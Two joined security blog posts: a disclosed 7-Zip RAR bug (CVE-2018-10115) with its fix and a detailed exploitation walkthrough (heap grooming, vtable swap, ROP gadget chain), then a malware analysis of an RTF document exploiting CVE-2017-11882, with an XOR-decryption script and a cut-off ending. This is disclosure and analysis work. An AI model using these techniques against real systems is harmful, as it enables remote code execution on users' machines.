7-Zip: From Uninitialized Memory to Remote Code Execution

Introduction

7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

The Bug (CVE-2018-10115)

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: given a set of files (e.g., from a folder), we can treat them as one single concatenated data block and then compress this whole block (as opposed to compressing every file by itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.
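The following sketch gives a rough illustration of why this helps. It compares compressing a few similar files one by one with compressing their concatenation as a single solid block. Python's zlib (deflate) serves purely as a stand-in, since RAR's own algorithms are not in the standard library, and the file contents are made up.

```python
import zlib


def per_file_size(files):
    """Total compressed size when every file is compressed on its own."""
    return sum(len(zlib.compress(f, 9)) for f in files)


def solid_size(files):
    """Compressed size when all files are concatenated into one solid block."""
    return len(zlib.compress(b"".join(files), 9))


# Ten small, similar "files" that differ only in a trailing counter.
files = [b"config: retries=3 timeout=30 verbose=false\n" * 4 + str(i).encode()
         for i in range(10)]

print("per-file:", per_file_size(files))
print("solid:   ", solid_size(files))
```

In the solid case, the compressor can refer back to data from earlier files. Each separately compressed file has to start from scratch.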

In the RAR format (before version 5), solid compression can be used in a very flexible way: each item (representing a file) of the archive can be marked as solid, independently of all other items. The idea is that if an item with this solid bit set is decoded, the decoder does not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract that contains a loop which iterates over all items with a variable index. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);
if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, there is a different decoder object for each of these three encoding methods. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway, and the implicit assumption is that the caller of the decoder makes sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.
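The minimal Python model below reproduces only the solidStart logic quoted above: one decoder object per encoding method, with state initialization happening only on a non-solid decode. The names Decoder and extract are hypothetical and are not 7-Zip's. The model ignores IsSplitBefore() and everything else the real handler does.

```python
class Decoder:
    """Hypothetical stand-in for one RAR decoder (v1, v2 or v3).

    Like the real classes, the constructor does not initialize the decoding
    state; only a non-solid decode does.
    """

    def __init__(self):
        self.state_initialized = False
        self.is_solid = False

    def set_decoder_properties(self, is_solid):
        self.is_solid = bool(is_solid)

    def decode(self):
        if not self.is_solid:
            self.state_initialized = True  # (re)initialize before decoding
        # True means this decode ran on initialized state.
        return self.state_initialized


def extract(items):
    """items: list of (method, solid_bit) pairs in archive order.

    Only the very first item is forced to be non-solid, regardless of
    which decoder object ends up handling it.
    """
    decoders = {}
    solid_start = True
    results = []
    for method, solid_bit in items:
        is_solid = 1 if solid_bit else 0
        if solid_start:
            is_solid = 0
            solid_start = False
        if method not in decoders:
            decoders[method] = Decoder()  # one decoder object per method
        decoder = decoders[method]
        decoder.set_decoder_properties(is_solid)
        results.append((method, decoder.decode()))
    return results


# First item uses v1, second uses v2 with the solid bit set.
print(extract([("v1", False), ("v2", True)]))
# [('v1', True), ('v2', False)]: the v2 decoder runs on uninitialized state
```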

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).
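Here is a Python sketch of the second option, built around a hypothetical GuardedDecoder class. It is not the actual 7-Zip patch, which the text only describes as a variant of this approach. The strict flag chooses between aborting and silently forcing isSolid=false.

```python
class GuardedDecoder:
    """Hypothetical decoder that refuses to continue a solid stream until its
    state has been initialized by at least one non-solid decode."""

    def __init__(self, strict=True):
        self.strict = strict          # True: abort; False: force non-solid
        self.solid_allowed = False    # becomes True only after an init
        self.is_solid = False

    def set_decoder_properties(self, is_solid):
        if is_solid and not self.solid_allowed:
            if self.strict:
                raise ValueError("solid item before decoder state was initialized")
            is_solid = False          # downgrade instead of failing
        self.is_solid = bool(is_solid)

    def decode(self):
        if not self.is_solid:
            self.solid_allowed = True  # state is now (re)initialized
            return "reinitialized"
        return "continue"


decoder = GuardedDecoder(strict=False)
decoder.set_decoder_properties(1)  # solid request on a fresh decoder...
print(decoder.decode())            # ...is downgraded; prints: reinitialized
```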

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll, 7-zip.dll, 7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe, 7zG.exe, 7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.
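To check these properties on a given binary, the relevant bits can be read straight from the PE headers. The sketch below uses the documented PE field offsets and flag values (IMAGE_FILE_RELOCS_STRIPPED, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, HIGH_ENTROPY_VA, NX_COMPAT). The function name pe_mitigation_flags is my own. It only inspects header bits and does not verify that a relocation directory is actually present.

```python
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001                # FileHeader.Characteristics
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020  # OptionalHeader.DllCharacteristics
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100


def pe_mitigation_flags(data):
    """Return the ASLR/DEP-related header flags of a PE image given as bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_header = pe_offset + 4
    (characteristics,) = struct.unpack_from("<H", data, file_header + 18)
    optional_header = file_header + 20
    # DllCharacteristics is at offset 70 in both PE32 and PE32+ optional headers.
    (dll_chars,) = struct.unpack_from("<H", data, optional_header + 70)
    return {
        "relocs_stripped": bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED),
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "high_entropy_va": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }
```

Suppose you read a local copy of 7zG.exe with open(path, "rb").read() and pass in the bytes. A build that can be randomized should report dynamic_base set and relocs_stripped clear.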

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). If you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe, 7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This essentially enforces a W^X policy and therefore makes exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Use the command-line version of 7-Zip.

Each of these three methods invokes a different executable (7zFM.exe, 7zG.exe, 7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to commit to one extraction method.

The second method (extraction via context menu) seems to be the most attractive one: it is probably used very often, and at the same time it should give us fairly predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);
  else
    break;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NToPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that its least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).
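To make the primitive concrete, here is a simplified Python model of the quoted loop tail. In the model, the heap is a flat list of 32-bit words and ChSet starts at a chosen word index. The CorrHuff() branch is not modelled, the toy sizes are arbitrary, and huff_decode_tail is a hypothetical name. Because nothing bounds newBytePlace, the final swap can touch words far beyond the 256-entry ChSet array.

```python
MASK32 = 0xFFFFFFFF


def huff_decode_tail(memory, chset_base, ntopl, byte_place):
    """Model of the quoted tail of NCompress::NRar1::CDecoder::HuffDecode.

    memory     -- flat list of uint32 words standing in for the heap
    chset_base -- word index where ChSet starts
    ntopl      -- the stale (attacker-controlled) NToPl array
    byte_place -- value decoded from the input stream
    Returns newBytePlace, the word offset from ChSet that was written.
    """
    byte_place &= 0xFF
    cur_byte = memory[chset_base + byte_place]
    slot = cur_byte & 0xFF
    new_byte_place = ntopl[slot]              # newBytePlace = NToPl[curByte & 0xff]
    ntopl[slot] = (ntopl[slot] + 1) & MASK32  # ...followed by NToPl[...]++
    cur_byte = (cur_byte + 1) & MASK32        # curByte++ (post-increment)
    if (cur_byte & 0xFF) > 0xA1:
        raise NotImplementedError("CorrHuff branch is not modelled")
    # No bounds check on new_byte_place: this is the out-of-bounds swap.
    memory[chset_base + byte_place] = memory[chset_base + new_byte_place]
    memory[chset_base + new_byte_place] = cur_byte
    return new_byte_place


heap = [0] * 64          # toy heap; ChSet conceptually starts at word 0
heap[0] = 0x41414140     # stale ChSet[0]
heap[40] = 0xDEADBEEF    # a word of some "neighbouring object"
ntopl = [0] * 256
ntopl[0x40] = 40         # stale NToPl entry selected by ChSet[0] & 0xff
huff_decode_tail(heap, 0, ntopl, 0)
print(hex(heap[0]), hex(heap[40]))  # 0xdeadbeef 0x41414141
```

Note that the value written out of bounds is the stale ChSet entry plus one, matching the post-increment of curByte.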

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which will at the same time hold our payload. In particular, we use the RW-primitive from above to swap the pointer _window, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object. _window points to a 4MB-sized buffer that holds data extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _window buffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate the Low Fragmentation Heap (LFH) for the corresponding allocation size, then spray the LFH with multiple copies of the replacement object. This actually works, but because allocations on the LFH have been randomized since Windows 8, this method will never be able to place the Rar1 decoder object at a constant distance from any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. The Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. The Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating the Rar1 decoder. Only then is the solidStart flag set to false, which means that the next decoder is not initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open2 reads all items of the archive with the following code (simplified):

CItem item;

for (;;)
{
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled) {
    // some more code omitted
    break;
  }
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted
  _items.Add(item);
  
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom:

void AString::SetFrom(const char *s, unsigned len)
{
  if (len > _limit)
  {
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  }
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method always terminates the string with a null byte. Moreover, we see that AString keeps the same underlying buffer unless it is too small to hold the desired string. This gives rise to the following idea: assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we simply create an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.
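The trick can be checked with a small Python model of AString::SetFrom. The model is simplified: it starts from an empty buffer, whereas the real constructor may preallocate a few bytes. names_for is a hypothetical helper that derives the item names for a target byte sequence, longest name first.

```python
from typing import List


class AString:
    """Simplified model of the buffer handling in 7-Zip's AString::SetFrom."""

    def __init__(self):
        self.chars = bytearray(1)  # heap buffer of _limit + 1 bytes
        self.limit = 0
        self.length = 0

    def set_from(self, s: bytes) -> None:
        n = len(s)
        if n > self.limit:
            # Only grows (new char[len + 1]); shorter strings reuse the buffer.
            self.chars = bytearray(n + 1)
            self.limit = n
        self.chars[:n] = s
        self.chars[n] = 0  # always NUL-terminate
        self.length = n


def names_for(target: bytes, filler: int = 0x55) -> List[bytes]:
    """Item names that leave `target` in the AString buffer when applied in order.

    NULs in `target` are replaced by `filler`; SetFrom's terminator writes
    them back, starting with the longest name.
    """
    if not target or target[-1] != 0:
        raise ValueError("target must end with a NUL byte")
    if filler == 0:
        raise ValueError("filler must be non-zero")
    body = bytes(filler if b == 0 else b for b in target)
    zero_positions = [i for i, b in enumerate(target) if b == 0]
    return [body[:p] for p in reversed(zero_positions)]


target = bytes.fromhex("DEAD00BEEF00BAAD00")
s = AString()
for name in names_for(target):
    s.set_from(name)
print(bytes(s.chars).hex())  # dead00beef00baad00
```

The model also makes the second limitation visible. Each NUL in the target adds another name that repeats a prefix of the data, so the total name length grows with the number of NULs times the length of the sequence.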

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the sizes of allocations of this type need to be strictly increasing. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.

ROP

We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAlloc, memcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;
exit(0);

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.
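The sketch below puts these numbers in perspective by computing the observed failure rates together with a 95% Wilson score interval. The choice of interval is mine, not the author's. It also assumes that the runs are independent, which repeated launches on the same machine may not fully satisfy.

```python
import math


def wilson_interval(failures, trials, z=1.96):
    """Approximate 95% Wilson score interval for a failure probability."""
    p = failures / trials
    denom = 1 + z * z / trials
    center = (p + z * z / (2 * trials)) / denom
    half = z * math.sqrt(p * (1 - p) / trials + z * z / (4 * trials * trials)) / denom
    return max(0.0, center - half), min(1.0, center + half)


runs = {
    "Windows 10 RS4 (Build 17134.1) 64-bit": 17,
    "Windows 8.1 64-bit": 12,
    "Windows 7 SP1 64-bit": 90,
}
for system, failures in runs.items():
    low, high = wilson_interval(failures, 100_000)
    print(f"{system}: {failures / 100_000:.3%} failures "
          f"(95% CI {low:.3%} to {high:.3%})")
```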

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.

Conclusion

In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed to fail.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also enables ASLR on all the main executables.

Timeline of Disclosure

  • 2018-03-06 — Discovery
  • 2018-03-06 — Report
  • 2018-04-14 — MITRE assigned CVE-2018-10115
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

CVE-2017-11882 RTF: Full description

Two weeks ago, a malicious MS Word document was blocked by a sandbox (SHA-256: 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7). The sample looked interesting because, at that time, it had a limited detection rate on VirusTotal. Both VirusTotal and Any.Run identified the sample as CVE-2017-11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is a fairly complex format in itself. On top of that, adversaries add obfuscation layers to prevent both analysts and analysis tools from detecting the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier Stevens' rtfdump to look for OLE objects did not turn up anything useful.

Figure: rtfdump.py and rtfobj output (no OLE objects detected)

You can find a list of RTF obfuscation techniques in the links below:

Unfortunately, those tools did not find an OLE object either, so we simply searched for “d0cf” (the beginning of the OLE Compound File header signature), and one instance came up.
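Here is a minimal Python sketch of that search. It assumes the common obfuscation case in which whitespace has been inserted into the hex-encoded object data (RTF readers generally skip it). The sketch therefore strips whitespace before looking for the full 8-byte CFB signature D0 CF 11 E0 A1 B1 1A E1. find_ole_headers is a hypothetical helper, and other tricks, such as control words or junk inserted into the hex stream, are not handled.

```python
import re

OLE_CFB_MAGIC_HEX = "d0cf11e0a1b11ae1"  # OLE Compound File signature, hex-encoded


def find_ole_headers(rtf_text):
    """Return offsets of the OLE CFB signature in hex-encoded RTF data.

    Offsets refer to the text after all whitespace has been removed.
    """
    compact = re.sub(r"\s+", "", rtf_text).lower()
    return [m.start() for m in re.finditer(OLE_CFB_MAGIC_HEX, compact)]


print(find_ole_headers("aa d0cf11e0\r\n a1b11ae1"))  # [2]
```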

Figure: one OLE object instance identified

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02-0000-0000-c000-000000000046”, which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally, one OLE Native Stream was identified (instead of an Equation Native stream).

Figures: OLE CLSID related to Equation Editor; OLE Native Stream

How is the OLE Native Stream related? Cofense has published a relevant article:

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field.

Return to stack

The native stream is 0x795 (1941) bytes long, and the actual content follows after that offset. One can guess that the next 4 bytes, starting with 02 AB 01 E7, are related to the Equation Editor MTEF header (given that no Equation Native stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, the first of which should be 0x03. Apparently the MTEF header does not play an important role (or does it?). In addition, there are two extra bytes (0xA, 0x1) that do not map onto the MTEF specification. If anyone knows how to interpret those bytes, please enlighten me.
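The structure described so far can be sketched in Python. split_native_stream reads the 4-byte little-endian NativeDataSize field quoted above, and parse_mtef_header interprets five bytes as an MTEF v3 header. Both helpers are hypothetical. The header field names (version, generating platform, generating product, product version, product subversion) follow my reading of the MTEF specification, so treat them as an assumption.

```python
import struct
from typing import NamedTuple


class MtefHeader(NamedTuple):
    version: int             # expected to be 3 for Equation Editor 3.x data
    platform: int
    product: int
    product_version: int
    product_subversion: int


def split_native_stream(stream):
    """Split an OLE Native stream into (native_data, trailing_bytes)."""
    (size,) = struct.unpack_from("<I", stream, 0)  # NativeDataSize
    if 4 + size > len(stream):
        raise ValueError("NativeDataSize exceeds stream length")
    return stream[4:4 + size], stream[4 + size:]


def parse_mtef_header(data):
    """Interpret the first five bytes of `data` as an MTEF v3 header."""
    return MtefHeader(*struct.unpack_from("<5B", data, 0))
```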

Figure: shellcode map

The most important part is the Font Record, which has an ID of 0x8 followed by two one-byte identifiers, one for the typeface number and one for the style (0x9D and 0x7C respectively). The actual font name follows this byte sequence. The font name is stored in a 40-byte buffer; 8 more bytes are needed to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe.
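The following Python sketch uses a hypothetical helper, inspect_font_record, to parse a font record as described above and report which 32-bit value would land on the return address. It makes two assumptions: the name is copied strcpy-style, including the terminating NUL, and the 4 bytes between the 40-byte buffer and the return address are the saved frame pointer.

```python
import struct

FONT_RECORD_ID = 0x08
NAME_BUFFER_SIZE = 40               # stack buffer for the font name
RET_OFFSET = NAME_BUFFER_SIZE + 4   # assumed saved EBP, then the return address


def inspect_font_record(record):
    """Return (typeface, style, name, overwritten_return_address_or_None)."""
    if record[0] != FONT_RECORD_ID:
        raise ValueError("not a font record")
    typeface, style = record[1], record[2]
    end = record.index(0, 3)        # position of the NUL terminator
    name = record[3:end]
    copied = name + b"\x00"         # bytes written into the buffer and beyond
    ret = None
    if len(copied) >= RET_OFFSET + 4:
        (ret,) = struct.unpack_from("<I", copied, RET_OFFSET)
    return typeface, style, name, ret


malicious = bytes([0x08, 0x9D, 0x7C]) + b"A" * 44 + b"\x57\x21\x40\x00"
print(hex(inspect_font_record(malicious)[3]))  # 0x402157
```

In this model, a 47-byte name followed by its NUL terminator is enough, because the terminator supplies the high zero byte of 0x00402157.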

It is well known that this specific exploit targets a stack-based buffer overflow. Our bet is that after the ret instruction, execution returns to our shellcode. Let’s fire up Windbg.

Figure: Windbg, return to stack

Before the ret instruction executes, the top of the stack holds the address of our shellcode (0x0018f354). The ret pops this value into EIP. In the disassembly window, we can see that the shellcode is very clean.

Analyzing the shellcode

To analyze the shellcode, I used shellcode2exe and fired up IDA. The first call goes through 0x004667b0, the import address of the GlobalLock function in EQNEDT32.exe, which locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in an XOR decryption loop. The decryption covers 0x389 bytes starting at offset 0x3FE. To help with the decryption, I created a small IDA Python script (forgive any Python mistakes, Python n00b here). The script can be executed by typing run() in the IDA console.

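import struct

# Rolling-XOR decryption of the encrypted shellcode region, patched in place.
# Byte() and PatchByte() are the classic IDC functions available in the IDA console.
START = 0x4013fe    # start of the encrypted region (offset 0x3FE in the shellcode)
LENGTH = 0x389      # size of the encrypted region in bytes

def run():
    key = 0
    # Like the original loop, the last dword extends 3 bytes past LENGTH.
    for addr in range(START, START + LENGTH, 4):
        # key = key * 0x22A76047 + 0x2698B12D, truncated to 32 bits
        key = (key * 0x22A76047 + 0x2698B12D) & 0xFFFFFFFF
        key_bytes = struct.pack('<I', key)
        for i in range(4):
            # XOR each byte of the current dword with the matching key byte
            PatchByte(addr + i, Byte(addr + i) ^ ord(key_bytes[i:i + 1]))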

After running the script, a URL appeared in the decrypted bytes, so the decryption evidently worked.
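To experiment outside IDA, the same key schedule can be applied to a plain byte buffer. This standalone sketch reimplements the loop of the IDA script (xor_decrypt is a hypothetical name). Unlike the script, it stops at the end of the buffer instead of patching 3 bytes past the 0x389-byte region.

```python
import struct

KEY_MUL = 0x22A76047
KEY_ADD = 0x2698B12D


def xor_decrypt(data):
    """Apply the shellcode's rolling 32-bit XOR key to `data` (bytes).

    key_n = key_{n-1} * KEY_MUL + KEY_ADD (mod 2**32), starting from 0;
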